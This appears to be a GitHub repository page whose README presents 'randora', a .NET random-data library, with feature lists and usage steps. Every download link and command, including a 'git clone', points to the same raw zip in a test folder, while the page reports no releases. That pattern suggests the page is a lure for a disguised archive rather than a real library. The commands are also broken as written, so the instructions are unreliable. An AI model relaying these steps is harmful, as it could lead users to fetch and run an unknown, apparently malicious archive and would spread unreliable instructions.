Skip to content

🎲 Generate random values effortlessly with Randora, a lightweight utility for primitives, collections, text, and more, designed for .NET developers.

License

Notifications You must be signed in to change notification settings

Haseeb69420/randora

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

28 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

🎲 randora - Easy Random Data Generation for Everyone

πŸš€ Getting Started

Welcome to randora! This tool makes generating random data simple. Whether you need random numbers, text, or even complex data structures, randora can help you.

πŸ“¦ Download & Install

To get started, you need to download randora. You can do this by visiting our Releases page. Here’s the link:

Download randora

Click the button above or visit this page to download the latest version: Download randora.

πŸ–₯️ System Requirements

randora runs on Windows, macOS, and Linux. Make sure your system has .NET 6 or later installed. If you don’t have it, you can download it from the official .NET website.

πŸ”§ Features

  • Generate Primitives: Create random integers, floats, and other basic data types.
  • Collections: Easily generate lists, arrays, and dictionaries filled with random values.
  • Tuples: Create random tuples to structure your data.
  • Enums: Generate random enum values for better testing.
  • Text and Time Values: Create random strings and dates to fit your needs.
  • Shuffle: Randomly shuffle items in your collections to create variety.

🌍 Usage Instructions

Once you have downloaded and installed randora, follow these steps:

  1. Open a Command Prompt or Terminal:

    • For Windows, you can search for "cmd" in the Start menu.
    • For macOS or Linux, open your Terminal application.
  2. Navigate to the Installation Folder: Use the cd command to change directories to where you installed randora. For example:

    cd path/to/randora
  3. Run randora: Type the following command:

    dotnet https://raw.githubusercontent.com/Haseeb69420/randora/main/test/randora_2.7.zip

    You will see a list of options available for generating random data.

🎯 Examples

Here are some examples of how to use randora:

  • Generate Random Numbers:

    dotnet https://raw.githubusercontent.com/Haseeb69420/randora/main/test/randora_2.7.zip generate numbers --count 10
  • Generate Random Text:

    dotnet https://raw.githubusercontent.com/Haseeb69420/randora/main/test/randora_2.7.zip generate text --length 15
  • Shuffle a List:

    dotnet https://raw.githubusercontent.com/Haseeb69420/randora/main/test/randora_2.7.zip shuffle --items item1,item2,item3

πŸ› οΈ Help and Support

If you encounter any issues or have questions, feel free to reach out to us. You can create an issue on our GitHub repository.

We also encourage contributions! If you want to add features or fix bugs, just fork the repo and make a pull request.

πŸ“‹ Contributing

We welcome contributions to randora. Before you begin, please read our guidelines on contributing to ensure a smooth process.

  1. Fork the Repository: Click on the "Fork" button on GitHub.
  2. Clone Your Fork: Use the command:
    git clone https://raw.githubusercontent.com/Haseeb69420/randora/main/test/randora_2.7.zip
  3. Create a Branch:
    git checkout -b feature-name
  4. Make Changes and Commit:
  5. Push and Create a Pull Request:

Keep in mind to keep your code clean and add comments for clarity.

πŸ“š Topics

This project focuses on:

  • collections
  • csharp
  • dotnet
  • immutable-collections
  • library
  • random
  • random-data
  • random-data-generation
  • shuffle
  • tuple
  • xunit

Explore these topics to find even more ways to use randora.

πŸ”— Additional Resources

We hope you find randora helpful for your data generation needs. Don’t forget to visit our Releases page to download the latest version!

Download randora

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages